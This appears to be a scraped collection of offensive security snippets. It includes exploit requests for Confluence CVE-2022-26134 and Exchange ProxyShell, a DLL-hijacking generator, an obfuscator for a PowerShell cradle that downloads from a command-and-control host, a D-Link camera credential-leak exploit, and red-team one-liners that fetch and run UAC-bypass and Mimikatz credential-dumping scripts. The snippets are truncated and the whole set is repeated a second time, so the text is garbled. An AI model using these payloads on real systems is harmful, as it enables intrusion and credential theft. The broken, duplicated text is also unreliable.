lulz Udyz

## CVE-2022-26134
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: local.confluence
User-Agent: curl/7.68.0
Accept: */*

## blue.xml
<?xml version="1.0" encoding="utf-16"?>
<Answers Version="1.0">
	<Interaction ID="IT_RebrowseForFile">
		<Value>?</Value>
	</Interaction>
	<Interaction ID="IT_LaunchMethod">
		<Value>ContextMenu</Value>
	</Interaction>
	<Interaction ID="IT_SelectProgram">
		<Value>NotListed</Value>

## evilldll-gen.sh
#!/bin/sh

usage(){
        echo "# #################                Simple CPP to DLL Utility               ################# #"
        echo "# This tool has been maded to easily generate and compile a DLL to be used for DLL hijacking.#"
        echo "#                                                                                            #"
        echo "# ========================================================================================== #"
        echo "#                                                                                            #"
        echo "# Usage:                                                                                     #"
        echo "#   ./dll-gcc [Options] <input-file>                                                         #"

## CVE-2021-34473
POST /autodiscover/autodiscover.json?@evil.corp/EWS/Exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp HTTP/2
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: */*
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
	<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
	xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"

## cb-random.py
import random
def cmd(string):
    for _ in string:
        _ = _.replace("'", '\"')
        _ = _.replace('"', '\"')
        s = random.choice(["'"+_.lower()+"'+", "'"+_.upper()+"'+"]).replace(")'+", ")'")
        print(s, end='')

cmd("powershell.exe nop -wind hidden -Exec Bypass -noni -enc -C IeX (NeW-OBjeCt Net.WeBClIeNt).DownloadString('hxxp://c2.cobaltstrike.com/Malicious')")

## PoC_CVE-2021–31474.json
POST /api/Action/TestAction HTTP/1.1
Host: <target>
Content-Length: 3978
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: <token>
X-Requested-With: XMLHttpRequest
ViewLimitationID: 0
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Cookie: <cookie>

## PoC_CVE-2021-28482.py
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

## DCS-2530L Leaked admin
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import sys
def exploit(url):
        vuln = url + '/config/getuser?index=0'
        r = requests.get(vuln, verify=False, timeout=5)
        if r.status_code == 200 and 'priv=1' in r.text:
                user = r.text.split('name=')[1].split('\r\npass')[0]
                pwd = r.text.split('\r\npass=')[1].split('\r\npriv')[0]

## RedTeam_CheatSheet.ps1
# Description:
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands
	GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
	Host: local.confluence
	User-Agent: curl/7.68.0
	Accept: /
	<?xml version="1.0" encoding="utf-16"?>
	<Answers Version="1.0">
	<Interaction ID="IT_RebrowseForFile">
	<Value>?</Value>
	</Interaction>
	<Interaction ID="IT_LaunchMethod">
	<Value>ContextMenu</Value>
	</Interaction>
	<Interaction ID="IT_SelectProgram">
	<Value>NotListed</Value>
	#!/bin/sh

	usage(){
	echo "# ################# Simple CPP to DLL Utility ################# #"
	echo "# This tool has been maded to easily generate and compile a DLL to be used for DLL hijacking.#"
	echo "# #"
	echo "# ========================================================================================== #"
	echo "# #"
	echo "# Usage: #"
	echo "# ./dll-gcc [Options] <input-file> #"
	POST /autodiscover/autodiscover.json?@evil.corp/EWS/Exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp HTTP/2
	Host: localhost
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
	Accept: /
	Content-Type: text/xml

	<?xml version="1.0" encoding="utf-8"?>
	<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
	xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
	import random
	def cmd(string):
	for _ in string:
	_ = _.replace("'", '\"')
	_ = _.replace('"', '\"')
	s = random.choice(["'"+_.lower()+"'+", "'"+_.upper()+"'+"]).replace(")'+", ")'")
	print(s, end='')

	cmd("powershell.exe nop -wind hidden -Exec Bypass -noni -enc -C IeX (NeW-OBjeCt Net.WeBClIeNt).DownloadString('hxxp://c2.cobaltstrike.com/Malicious')")
	POST /api/Action/TestAction HTTP/1.1
	Host: <target>
	Content-Length: 3978
	Accept: application/json, text/javascript, /; q=0.01
	X-XSRF-TOKEN: <token>
	X-Requested-With: XMLHttpRequest
	ViewLimitationID: 0
	User-Agent: Mozilla/5.0
	Content-Type: application/json; charset=UTF-8
	Cookie: <cookie>
	import requests
	import time
	import sys
	from base64 import b64encode
	from requests_ntlm2 import HttpNtlmAuth
	from urllib3.exceptions import InsecureRequestWarning
	from urllib import quote_plus

	requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
	import requests
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
	import sys
	def exploit(url):
	vuln = url + '/config/getuser?index=0'
	r = requests.get(vuln, verify=False, timeout=5)
	if r.status_code == 200 and 'priv=1' in r.text:
	user = r.text.split('name=')[1].split('\r\npass')[0]
	pwd = r.text.split('\r\npass=')[1].split('\r\npriv')[0]
	# Description:
	# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

	# Invoke-Mimikatz: Dump credentials from memory
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

	# Import Mimikatz Module to run further commands